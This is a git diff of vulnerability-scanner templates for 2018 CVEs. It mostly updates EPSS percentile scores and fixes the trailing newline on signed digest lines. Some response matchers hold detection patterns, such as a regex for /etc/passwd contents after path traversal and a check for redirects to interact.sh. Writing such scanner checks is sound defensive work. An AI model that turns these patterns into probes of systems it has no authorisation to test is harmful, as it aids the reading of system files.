6b82927f6a..dc8edbefb1 100644 --- a/http/cves/2018/CVE-2018-12634.yaml +++ b/http/cves/2018/CVE-2018-12634.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-12634 cwe-id: CWE-200 epss-score: 0.95864 - epss-percentile: 0.99261 + epss-percentile: 0.99262 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index 0f7a05f200..705c7a6aac 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-12675 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.45643 + epss-percentile: 0.45669 cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:* metadata: verified: true @@ -38,4 +38,5 @@ http: part: body words: - '' -# digest: 4a0a00473045022100a5cfad78d49d7ffa3bb2deae0dc7ca1913143d029ffa2f442463049cf3f8dbbc022028fb0e8a7c1eda21dc09c93e1e4915b5a6da92c46c4f4687b255afd5facd72d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a5cfad78d49d7ffa3bb2deae0dc7ca1913143d029ffa2f442463049cf3f8dbbc022028fb0e8a7c1eda21dc09c93e1e4915b5a6da92c46c4f4687b255afd5facd72d7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index 923ca15628..2c171a6ce0 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-1271 cwe-id: CWE-22 epss-score: 0.01096 - epss-percentile: 0.82832 + epss-percentile: 0.82849 cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100997f85a7f6c2d322063eeb807aeee190c12d89ed7e90659105dd697186afd98b022053fa71d788c4355f72ec1f525839c1c9fe682ca0565ccb5b33be44527f199a38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100997f85a7f6c2d322063eeb807aeee190c12d89ed7e90659105dd697186afd98b022053fa71d788c4355f72ec1f525839c1c9fe682ca0565ccb5b33be44527f199a38:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1273.yaml b/http/cves/2018/CVE-2018-1273.yaml index af566aee66..8adbd7962a 100644 --- a/http/cves/2018/CVE-2018-1273.yaml +++ b/http/cves/2018/CVE-2018-1273.yaml @@ -53,4 +53,5 @@ http: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or -# digest: 490a00463044022021aca5448b33839e88125bb44465b89beef83a11cefd34fe867837b79524966f02203ea24cda8dd5fb0dc039b63319bc99bfe96b3fcbf429322ceec274f61e41bd5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022021aca5448b33839e88125bb44465b89beef83a11cefd34fe867837b79524966f02203ea24cda8dd5fb0dc039b63319bc99bfe96b3fcbf429322ceec274f61e41bd5a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12909.yaml b/http/cves/2018/CVE-2018-12909.yaml index 839f6fbcf0..145aaffd69 100644 --- a/http/cves/2018/CVE-2018-12909.yaml +++ b/http/cves/2018/CVE-2018-12909.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-12909 cwe-id: CWE-22 epss-score: 0.01119 - epss-percentile: 0.83008 + epss-percentile: 0.83024 cpe: cpe:2.3:a:webgrind_project:webgrind:1.5.0:*:*:*:*:*:*:* metadata: verified: true @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220284232c22cd4a3b304e85a9d9e215c09ad2254e2cc6b7ba2f03254c45a38df73022100e3eb34f67a29f72a2cb7202216cae8ee76b20d55991b14c840cdc5c6f5c9a71f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220284232c22cd4a3b304e85a9d9e215c09ad2254e2cc6b7ba2f03254c45a38df73022100e3eb34f67a29f72a2cb7202216cae8ee76b20d55991b14c840cdc5c6f5c9a71f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12998.yaml b/http/cves/2018/CVE-2018-12998.yaml index a489522f7b..a5cf537029 100644 --- a/http/cves/2018/CVE-2018-12998.yaml +++ b/http/cves/2018/CVE-2018-12998.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-12998 cwe-id: CWE-79 epss-score: 0.97052 - epss-percentile: 0.99676 + epss-percentile: 0.99677 cpe: cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220647c5c158e19860a0860bbe915ab61f37f0cdf2fa2ac28298e7488260383eaac02205141bef8306d8cc1fa78f2a895556c201f9013a3bdd71ac7a04d815835bfcfd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220647c5c158e19860a0860bbe915ab61f37f0cdf2fa2ac28298e7488260383eaac02205141bef8306d8cc1fa78f2a895556c201f9013a3bdd71ac7a04d815835bfcfd8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml index e8e87323c9..3bca457386 100644 --- a/http/cves/2018/CVE-2018-1335.yaml +++ b/http/cves/2018/CVE-2018-1335.yaml @@ -17,7 +17,7 @@ info: cvss-score: 8.1 cve-id: CVE-2018-1335 epss-score: 0.9738 - epss-percentile: 0.99882 + epss-percentile: 0.99883 cpe: cpe:2.3:a:apache:tika:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index c77b5cb29e..b71ea2a03c 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-13379 cwe-id: CWE-22 epss-score: 0.97336 - epss-percentile: 0.99851 + epss-percentile: 0.99852 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index 18a4edf799..adafaa26c2 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-13380 cwe-id: CWE-79 epss-score: 0.00122 - epss-percentile: 0.46272 + epss-percentile: 0.46297 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -50,4 +50,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fefc3b5e11f39b4c4de743919bcea02b6fa4b4dc4e86af2c3b703d924be3902902204ecf589acf6f1b98cc96e15ecdfb90a38a156d82c73cda0b84d4493b73020403:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100fefc3b5e11f39b4c4de743919bcea02b6fa4b4dc4e86af2c3b703d924be3902902204ecf589acf6f1b98cc96e15ecdfb90a38a156d82c73cda0b84d4493b73020403:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index 25fd192601..ccedcc7893 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-13980 cwe-id: CWE-22 epss-score: 0.0018 - epss-percentile: 0.55063 + epss-percentile: 0.55079 cpe: cpe:2.3:a:zeta-producer:zeta_producer:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022068e7f321ce1ecc2d75d6e91ce37e5896ac19efa69772c6b895cb762a4364e49f022100ee1f7f07e3f0ef51da429d429f2d8d88c4978e155d4c8731e7afb3b77d1f0e03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022068e7f321ce1ecc2d75d6e91ce37e5896ac19efa69772c6b895cb762a4364e49f022100ee1f7f07e3f0ef51da429d429f2d8d88c4978e155d4c8731e7afb3b77d1f0e03:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index 9b003a2ede..4a2a981b41 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-14013 cwe-id: CWE-79 epss-score: 0.00512 - epss-percentile: 0.74032 + epss-percentile: 0.74046 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bfbc67fac4fd79829c4d012770e00a6535c28fa0e1ce301c6aa5537ad547f5b902210090e448e9248371c28a4a0943a51fc8468b8ef82120a6b9daf14416079a8c0560:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100bfbc67fac4fd79829c4d012770e00a6535c28fa0e1ce301c6aa5537ad547f5b902210090e448e9248371c28a4a0943a51fc8468b8ef82120a6b9daf14416079a8c0560:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14064.yaml b/http/cves/2018/CVE-2018-14064.yaml index a676c96483..701290b793 100644 --- a/http/cves/2018/CVE-2018-14064.yaml +++ b/http/cves/2018/CVE-2018-14064.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-14064 cwe-id: CWE-22 epss-score: 0.24472 - epss-percentile: 0.96092 + epss-percentile: 0.96096 cpe: cpe:2.3:o:velotismart_project:velotismart_wifi_firmware:b-380:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207b6ef254fb480b45c39a4a7f2c9d24f94c95ff27bba4c12522ee3f7bf73c42e3022100de8667d128a6d689c9941d534ab11c8bc1ad7714c7bbcfd89ce392681e95a9ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502207b6ef254fb480b45c39a4a7f2c9d24f94c95ff27bba4c12522ee3f7bf73c42e3022100de8667d128a6d689c9941d534ab11c8bc1ad7714c7bbcfd89ce392681e95a9ad:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index 37cfa7a89a..fef314621d 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-14474 cwe-id: CWE-601 epss-score: 0.00068 - epss-percentile: 0.28481 + epss-percentile: 0.28494 cpe: cpe:2.3:a:goodoldweb:orange_forum:1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 @@ -39,4 +39,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a0047304502204ccf8aaef92cbe7c68384d747cf3396c7d6f537b3d80689c04bbd1882181355f022100ca09a3414f7a6c591354c36047287875898974fb0809c461f477405b5fa3df08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502204ccf8aaef92cbe7c68384d747cf3396c7d6f537b3d80689c04bbd1882181355f022100ca09a3414f7a6c591354c36047287875898974fb0809c461f477405b5fa3df08:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index 7fa0a4277c..f52b7f29c6 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-14574 cwe-id: CWE-601 epss-score: 0.01218 - epss-percentile: 0.83798 + epss-percentile: 0.83807 cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - type: status status: - 301 -# digest: 4a0a00473045022100a5d89de12e90690f678b88b246fa8c65225310ca2efed9a2cf150127cc4d7cb702202235b5eecbbc0ff17fae68eee97ee92c14e380c12169e5991a28e9c208acac5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a5d89de12e90690f678b88b246fa8c65225310ca2efed9a2cf150127cc4d7cb702202235b5eecbbc0ff17fae68eee97ee92c14e380c12169e5991a28e9c208acac5a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14728.yaml b/http/cves/2018/CVE-2018-14728.yaml index a9d782d5dd..202ee65790 100644 --- a/http/cves/2018/CVE-2018-14728.yaml +++ b/http/cves/2018/CVE-2018-14728.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-14728 cwe-id: CWE-918 epss-score: 0.96833 - epss-percentile: 0.99576 + epss-percentile: 0.99577 cpe: cpe:2.3:a:tecrail:responsive_filemanager:9.13.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index 3cb997b311..8779398677 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-14912 cwe-id: CWE-22 epss-score: 0.9702 - epss-percentile: 0.99659 + epss-percentile: 0.99661 cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220597ac5d6eecf19f6e935f6b7ef14270accaa5d389964f5ef5298d2577d64617002205e16dd2ae532f6dcdb3c054ede1c8cd001ba9be728ff55416c3529aa206c34ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220597ac5d6eecf19f6e935f6b7ef14270accaa5d389964f5ef5298d2577d64617002205e16dd2ae532f6dcdb3c054ede1c8cd001ba9be728ff55416c3529aa206c34ca:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index e9d66a8792..bc9798af8b 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-14916 cwe-id: CWE-732 epss-score: 0.00483 - epss-percentile: 0.73288 + epss-percentile: 0.73304 cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022064c4d254e8146eac5740737a6250a88d532fcd996e1dd26425a4d1a2d2aef5ac0220234fa4ee7e6c96bb701ce5957b09149a85c71ee8e1e0a4e1753d90758289c6b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022064c4d254e8146eac5740737a6250a88d532fcd996e1dd26425a4d1a2d2aef5ac0220234fa4ee7e6c96bb701ce5957b09149a85c71ee8e1e0a4e1753d90758289c6b4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index e36048ffd1..1e99b40d50 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-14918 cwe-id: CWE-22 epss-score: 0.44897 - epss-percentile: 0.96994 + epss-percentile: 0.96997 cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200c7ef1a748b199f4d78f339a984f8fa23936742a93dff66a5e8146f9097bb710022100b52ffdafdbee8af45ae2af6be6854f1f0e294b06912c60d1a6736d9711d4280f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200c7ef1a748b199f4d78f339a984f8fa23936742a93dff66a5e8146f9097bb710022100b52ffdafdbee8af45ae2af6be6854f1f0e294b06912c60d1a6736d9711d4280f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index 2f045a3fc8..6aa150a8e6 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-14931 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.45643 + epss-percentile: 0.45669 cpe: cpe:2.3:a:polarisft:intellect_core_banking:9.7.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -34,4 +34,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a0046304402207a1fa91af6a94c2698f19c7e2da2f3d960d196aff73ad80a7307a3be4c7face102207956772c7195d3e080f65e5f956eb9047b634cc5fc3d8e50489840af546b36a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207a1fa91af6a94c2698f19c7e2da2f3d960d196aff73ad80a7307a3be4c7face102207956772c7195d3e080f65e5f956eb9047b634cc5fc3d8e50489840af546b36a1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index 52c392f704..fb20455468 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-15138 cwe-id: CWE-22 epss-score: 0.28185 - epss-percentile: 0.9631 + epss-percentile: 0.96314 cpe: cpe:2.3:a:ericssonlg:ipecs_nms:30m-2.3gn:*:*:*:*:*:*:* metadata: max-request: 2 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022048250fcddd9e9611d30e39cefb2e3c6ae0a184f7b312de016443fd2dd56d34b6022100a416859d2a502524bee8fffff83ab635fbc1992e606419148d695d8ff4ea0252:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022048250fcddd9e9611d30e39cefb2e3c6ae0a184f7b312de016443fd2dd56d34b6022100a416859d2a502524bee8fffff83ab635fbc1992e606419148d695d8ff4ea0252:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index 89697cfce8..553f174fae 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-15517 cwe-id: CWE-918 epss-score: 0.01414 - epss-percentile: 0.85054 + epss-percentile: 0.85062 cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:* metadata: max-request: 1 @@ -36,4 +36,5 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a0047304502204bd35fc8fc1eec767e2a2834bcf1ed835d8d07e4bbbcb393cc80c0b6481c1e13022100c977531ca745c169466710fec15abee1f4dc15589faa3ce08cefe564cf25336c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502204bd35fc8fc1eec767e2a2834bcf1ed835d8d07e4bbbcb393cc80c0b6481c1e13022100c977531ca745c169466710fec15abee1f4dc15589faa3ce08cefe564cf25336c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml index 9c87c64ff5..42d9096684 100644 --- a/http/cves/2018/CVE-2018-15535.yaml +++ b/http/cves/2018/CVE-2018-15535.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-15535 cwe-id: CWE-22 epss-score: 0.97149 - epss-percentile: 0.99726 + epss-percentile: 0.99728 cpe: cpe:2.3:a:tecrail:responsive_filemanager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index ed8c4c6b9b..a67429d0fa 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ b/http/cves/2018/CVE-2018-15745.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-15745 cwe-id: CWE-22 epss-score: 0.95386 - epss-percentile: 0.99144 + epss-percentile: 0.99145 cpe: cpe:2.3:a:argussurveillance:dvr:4.0.0.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022057970e707a55f0572bf4a5609ece9f82b5546fed3c6f1d12ea1e6befc885acc002200488e1a552e0c215653b6180eb776efcb5b0d0041b736e5b773e8ddbc1fe0090:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022057970e707a55f0572bf4a5609ece9f82b5546fed3c6f1d12ea1e6befc885acc002200488e1a552e0c215653b6180eb776efcb5b0d0041b736e5b773e8ddbc1fe0090:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml index c19ff17979..d07bc88851 100644 --- a/http/cves/2018/CVE-2018-15917.yaml +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-15917 cwe-id: CWE-79 epss-score: 0.05086 - epss-percentile: 0.92055 + epss-percentile: 0.92059 cpe: cpe:2.3:a:jorani_project:jorani:0.6.5:*:*:*:*:*:*:* metadata: verified: true @@ -56,4 +56,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207c2c547145ad2cbe36d554ebe8b6ed25431c6a3b0c9ad80f3b335f25cf1b8a04022100aeb9b7094651c0f83f83b8a6a21c37edbcbc9a83d0cbdb63b81092952083b0aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502207c2c547145ad2cbe36d554ebe8b6ed25431c6a3b0c9ad80f3b335f25cf1b8a04022100aeb9b7094651c0f83f83b8a6a21c37edbcbc9a83d0cbdb63b81092952083b0aa:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16059.yaml b/http/cves/2018/CVE-2018-16059.yaml index 9fb8b3bdbe..0dbacd2ab1 100644 --- a/http/cves/2018/CVE-2018-16059.yaml +++ b/http/cves/2018/CVE-2018-16059.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-16059 cwe-id: CWE-22 epss-score: 0.3698 - epss-percentile: 0.96737 + epss-percentile: 0.9674 cpe: cpe:2.3:o:endress:wirelesshart_fieldgate_swg70_firmware:3.00.07:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a0a5133ad9cdbc5adc21e89cb6551919043ca9ba525621f791d8b77266e599f6022100bccb926ab7edea0e7b89791cd4ba8499c6c56aa566aed26e84e42b63369abfed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a0a5133ad9cdbc5adc21e89cb6551919043ca9ba525621f791d8b77266e599f6022100bccb926ab7edea0e7b89791cd4ba8499c6c56aa566aed26e84e42b63369abfed:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml index e4482b56bc..5b6a5a6d7f 100644 --- a/http/cves/2018/CVE-2018-16133.yaml +++ b/http/cves/2018/CVE-2018-16133.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-16133 cwe-id: CWE-22 epss-score: 0.05113 - epss-percentile: 0.92071 + epss-percentile: 0.92074 cpe: cpe:2.3:a:cybrotech:cybrohttpserver:1.0.3:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - "fonts" - "extensions" condition: and -# digest: 4b0a00483046022100c15f9c9499f4e059c24734fa0ce0a9cad60980d3cdcc03f53fb12e155ef9d8d1022100e47128693aff1ce4e563b396268dc240e34ca77d1055f41387ad7262d92e0b7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c15f9c9499f4e059c24734fa0ce0a9cad60980d3cdcc03f53fb12e155ef9d8d1022100e47128693aff1ce4e563b396268dc240e34ca77d1055f41387ad7262d92e0b7f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index 0a87e30759..0da3d4fa61 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-16139 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48521 + epss-percentile: 0.48547 cpe: cpe:2.3:a:bibliosoft:bibliopac:2008:*:*:*:*:*:*:* metadata: verified: true @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210092d1dd53aed03ab080ef8db1dd64738d864ecc1e4c9a2eaaf89b631155c750c5022100e684fdc51cb871fe9080408e49309956694604d16f14dd698748a0ea1d5860d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210092d1dd53aed03ab080ef8db1dd64738d864ecc1e4c9a2eaaf89b631155c750c5022100e684fdc51cb871fe9080408e49309956694604d16f14dd698748a0ea1d5860d5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index 07c2922c2d..da6e21e4de 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-16159 cwe-id: CWE-89 epss-score: 0.01247 - epss-percentile: 0.84024 + epss-percentile: 0.84035 cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -47,4 +47,5 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "images") && contains(body, "title")' condition: and -# digest: 4a0a00473045022100e2d0172613748636216cdd798bdd1196389445479e36e39f8ddaeb114fc8bf0d022064c4fcd1167bf59565d468881519253bcfd0c4e5e68631820cfe78de7fa4117a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e2d0172613748636216cdd798bdd1196389445479e36e39f8ddaeb114fc8bf0d022064c4fcd1167bf59565d468881519253bcfd0c4e5e68631820cfe78de7fa4117a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index d95c6a0983..c570dd0968 100644 --- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-16283 cwe-id: CWE-22 epss-score: 0.10923 - epss-percentile: 0.94491 + epss-percentile: 0.94496 cpe: cpe:2.3:a:wechat_brodcast_project:wechat_brodcast:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a00473045022100faca859ae0617981e935cbeba58ec7d23a514cebab9a1db9b0a48338d22583b50220100cfcf0a7644cd6138b0e9af05c2c6feb92e949113d9698e610748f425849a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100faca859ae0617981e935cbeba58ec7d23a514cebab9a1db9b0a48338d22583b50220100cfcf0a7644cd6138b0e9af05c2c6feb92e949113d9698e610748f425849a0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index 086d67daae..45e8377b9c 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-16288 cwe-id: CWE-200 epss-score: 0.16221 - epss-percentile: 0.95392 + epss-percentile: 0.95399 cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml index dde810d043..9ec32e006e 100644 --- a/http/cves/2018/CVE-2018-16299.yaml +++ b/http/cves/2018/CVE-2018-16299.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-16299 cwe-id: CWE-22 epss-score: 0.03312 - epss-percentile: 0.90252 + epss-percentile: 0.90258 cpe: cpe:2.3:a:localize_my_post_project:localize_my_post:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 